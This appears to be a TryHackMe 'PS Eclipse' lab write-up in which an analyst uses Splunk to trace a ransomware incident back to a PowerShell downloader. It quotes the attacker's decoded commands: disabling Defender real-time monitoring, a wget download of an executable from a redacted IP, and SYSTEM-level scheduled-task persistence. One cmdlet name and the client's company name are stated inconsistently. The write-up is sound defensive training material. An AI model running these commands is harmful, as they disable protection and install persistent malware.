Ransomware Investigation with Splunk | TryHackMe PS Eclipse

Introduction

We used Splunk to investigate the ransomware activity on a Windows machine. The ransomware was downloaded to the machine through Powershell and did a partial file system encryption. This was part of TryHackMe PS Eclipse

Scenario: You are a SOC Analyst for an MSSP (Managed Security Service Provider) company called TryNotHackMe.

A customer sent an email asking for an analyst to investigate the events that occurred on Keegan’s machine on Monday, May 16th, 2022. The client noted that the machine is operational, but some files have a weird file extension. The client is worried that there was a ransomware attempt on Keegan’s device.

Your manager has tasked you to check the events in Splunk to determine what occurred in Keegan’s device.

 Scenario

I was playing the role of a SOC analyst for a company called “React Me.” A customer reported some suspicious activity on an employee named Keegan’s machine. The machine was still working, but some files had really weird extensions, which immediately made me suspect a ransomware attack. My main task was to investigate everything that happened on Keegan’s machine on Monday, May 16, 2022.

Investigation Steps using Splunk

1. Initial Data Exploration

I started by loading all the ingested data into Splunk since there wasn’t a specific index provided. This gave me around 17,000 events to sift through. I looked at the available fields and picked out the ones that seemed most useful, like ComputerName, DestinationIP, DestinationPort, EventCode, FilePath, Image, ProcessName, QueryName, SourceIP, TargetFileName, and User. I noticed two computer names and a single source IP, which I assumed belonged to Keegan’s machine. The destination IPs and ports (like 443 for HTTPS and 80 for HTTP) clearly indicated network activity, most likely downloads.

2. Identifying the Suspicious Binary

I honed in on network connections, especially those over port 443 (HTTPS), as they had the most events. I quickly spotted a suspicious executable named “outstanding_gutter.exe” located in the temp directory, frequently associated with a specific destination IP. To confirm this, I checked events on port 80 (HTTP) and found some PowerShell activity. By examining the command line arguments for PowerShell, I uncovered a base64 encoded string.

3. Decoding the PowerShell Command

I used CyberChef to decode the base64 string. The decoded command revealed several critical actions:

• Set-Preference -DisableRealTimeMonitoring $true: This command disables real-time monitoring, which is a classic move to evade detection.
• wget <IP_address>/outstanding_gutter.exe -OutFile C:\Windows\Temp\outstanding_gutter.exe: This command downloaded the “outstanding_gutter.exe” file from a specific IP address and saved it to the temp directory.
• Commands to create and run a scheduled task to execute “outstanding_gutter.exe” with elevated (SYSTEM) privileges.

4. Tracing the Binary’s Activity

I then searched for events related to “outstanding_gutter.exe.” I looked at the QueryName field, which often shows DNS queries. This revealed the binary connecting to a domain ending in ngrok.io, which I identified as the C2 (Command and Control) server.

5. Discovering the PowerShell Ransomware Script

My investigation suggested that “outstanding_gutter.exe” wasn’t the ransomware itself, but rather a downloader or facilitator. So, I searched for PowerShell scripts (.ps1 extension) in the same temp directory. A script named script.ps1 immediately stood out. While the logs didn’t explicitly show “outstanding_gutter.exe” downloading script.ps1, the scenario and the script’s location strongly implied this connection.

6. Identifying the Actual Ransomware Name

To figure out the true nature of script.ps1, I looked for its hash. By searching the hash on VirusTotal (a standard step in such investigations), I discovered the actual name of the malicious script was “BlackSun.” The attacker had simply renamed it to script.ps1 to make it seem less suspicious.

7. Finding the Ransom Note and Wallpaper

Finally, I searched for text files (.txt) to locate the ransom note, and indeed, a note was found in the temp directory. I then searched for image files (.jpg) and found an image file, also in the temp directory, which was likely used to replace the user’s desktop wallpaper.

Technical Commands Extracted (from the decoded PowerShell script):

• Set-Preference -DisableRealTimeMonitoring $true
• wget <IP_address>/outstanding_gutter.exe -OutFile C:\Windows\Temp\outstanding_gutter.exe
• SCHTASKS /Create /TN OutstandingGutter /TR C:\Windows\Temp\outstanding_gutter.exe /SC ONSTART /RU SYSTEM /F (This command creates a scheduled task to run the executable with SYSTEM privileges).
• SCHTASKS /Run /TN OutstandingGutter (This command runs the scheduled task).

In a nutshell, I started by sifting through all the Splunk logs. I noticed a lot of network traffic, especially downloads. A suspicious file, “outstanding_gutter.exe,” caught my attention. By digging into PowerShell commands, I found a base64 encoded script that, when decoded, showed this executable being downloaded and then set up to run with the highest privileges using a scheduled task. This executable then connected to a command and control server. It turned out that “outstanding_gutter.exe” wasn’t the final payload; it was used to download another PowerShell script, which I found in the same temporary folder, named script.ps1. By checking its hash, I uncovered its real, more sinister name: “BlackSun.” Finally, I located the ransom note (a text file) and the image file that ransomware often uses to change the desktop wallpaper.

It was a step-by-step process of following the digital breadcrumbs in the logs to piece together exactly how the ransomware attack unfolded.

TryHackMe PS Eclipse Answers

Video Walkthrough